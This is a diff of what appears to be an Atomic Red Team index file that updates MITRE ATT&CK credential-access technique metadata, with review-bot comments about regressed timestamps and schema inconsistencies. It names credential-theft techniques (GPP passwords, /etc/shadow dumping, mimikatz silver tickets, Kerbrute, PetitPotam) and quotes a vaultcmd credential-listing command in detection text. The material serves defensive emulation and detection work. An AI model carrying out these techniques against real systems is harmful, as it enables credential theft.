- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
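Review bot: T1528 keeps `atomic_tests: []` at the top of this hunk even though its technique metadata is refreshed to the 2024-10-14 upstream object; if this PR also adds a T1528 atomic anywhere else in the repo, this index was generated before that test existed and needs a rerun so the test is listed here. If no T1528 atomic is being added, the metadata-only refresh and the T1552.006 reorder below it look consistent.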
@@ -78248,20 +78974,49 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests:
- name: GPP Passwords (findstr)
@@ -78340,7 +79095,7 @@ credential-access:
name: powershell
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
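Review bot: the `modified` timestamp for T1556.008 regresses from `'2023-10-31T14:00:00.188Z'` to `'2023-05-04T18:02:51.318Z'`, and unlike most techniques in this diff the object is not refreshed to a 2024 date. Please check that this is the current upstream value rather than an older object; the old `14:00:00.188Z` value has the same shape as the placeholder timestamps being replaced elsewhere in this file, so it may have been synthetic, in which case a one-line note in the PR would spare the next reader the same question.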
@@ -78415,11 +79170,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -78463,11 +79217,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -78491,8 +79244,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
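Review bot: the `GitHub AWS-ADFS-Credential-Generator` reference now points at `github.com/pvanbuijtene/...` while its description still attributes the project to Damian Hickey (2017), so the URL and the citation text no longer agree on the owner; the old `github.com/damianh/...` URL is dropped without the text saying whether the new one is a fork or a moved repository. This is upstream ATT&CK text, so not a blocker for the index, but it is worth verifying that the new URL actually serves the same project before publishing.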
@@ -78508,11 +79261,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -78523,11 +79275,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -78537,16 +79291,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -78584,13 +79338,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -78599,6 +79350,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -78606,11 +79358,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -78628,13 +79380,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -78647,6 +79396,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -78660,12 +79410,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -78697,17 +79448,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -78780,7 +79528,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests:
- name: PowerShell - Prompt User for Password
@@ -78801,7 +79548,7 @@ credential-access:
name: powershell
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -78810,6 +79557,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -78828,18 +79576,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -78863,13 +79611,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -78895,6 +79640,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -78906,18 +79652,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -78936,9 +79682,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests:
- name: Brute Force:Credential Stuffing using Kerbrute Tool
@@ -78988,7 +79731,7 @@ credential-access:
\ \n"
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -79017,24 +79760,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -79069,13 +79814,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -79153,9 +79895,8 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests:
- name: PetitPotam
@@ -79237,7 +79978,7 @@ credential-access:
elevation_required: false
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -79253,6 +79994,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -79261,13 +80003,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -79275,15 +80017,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
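Review bot: the removal of `x_mitre_permissions_required:` with `Administrator`, `SYSTEM`, `root`, `User` drops the only field in this object that recorded the privilege level the technique needs; if any tooling labels or filters atomics by required privilege from this field rather than from each test's `elevation_required`, it will silently lose that signal. The `+ revoked: false` addition is consistent with the `x_mitre_deprecated: false` added in the previous hunk.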
@@ -79294,9 +80032,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -79342,7 +80079,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
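Review bot: `modified` moves backwards for T1557.002, from `'2022-11-08T14:00:00.188Z'` to `'2022-07-22T18:37:22.176Z'`, while every other object in the patch moves forward to a 2024 date, and the following hunk keeps `x_mitre_attack_spec_version: 2.1.0` unchanged. That pattern suggests the source for this object is a different (older) revision than for the rest; confirm the upstream object really was not updated rather than the generator having picked up a stale copy.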
@@ -79361,17 +80098,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -79404,10 +80140,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -79444,11 +80179,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -79516,34 +80250,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
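Review bot: the description context lines `Adversaries may attempt to dump the contents of /etc/passwd`, `and /etc/shadow` and `. By default, /etc/shadow` carry line breaks where inline code markup was evidently stripped, leaving orphaned punctuation at line starts. The lines are unchanged by this patch, so this is a pre-existing generator issue (the same pattern shows in the T1555.004, T1556.001 and T1556.005 detection text further down), but since this object is being rewritten wholesale anyway it is a good moment to fix the stripping so the text reflows as a single sentence.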
@@ -79552,20 +80262,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
@@ -79597,7 +80329,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
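Review bot: `modified` regresses for T1558.002 from `'2021-04-29T14:49:39.188Z'` to `'2020-03-25T21:46:46.831Z'`, and the next hunk removes `x_mitre_attack_spec_version: 2.1.0` without adding a replacement, so this object ends the patch with an older modified date and no spec version at all, unlike its neighbours which gain `3.2.0`. Confirm the upstream object for T1558.002 is the intended revision before merging.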
@@ -79623,8 +80355,6 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests:
- name: Crafting Active Directory silver tickets with mimikatz
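Review bot: `x_mitre_permissions_required:` / `- User` survives here as unchanged context while the same field is deleted from T1056, T1003.008, T1556.001, T1556.005 and T1003.006 elsewhere in the patch. Either T1558.002 was regenerated from a different source than the rest or the field removal is only partial; either way the inconsistency should be resolved so the file has one schema for all technique objects.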
@@ -79710,7 +80440,7 @@ credential-access:
-ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n"
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -79727,24 +80457,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -79785,9 +80515,8 @@ credential-access:
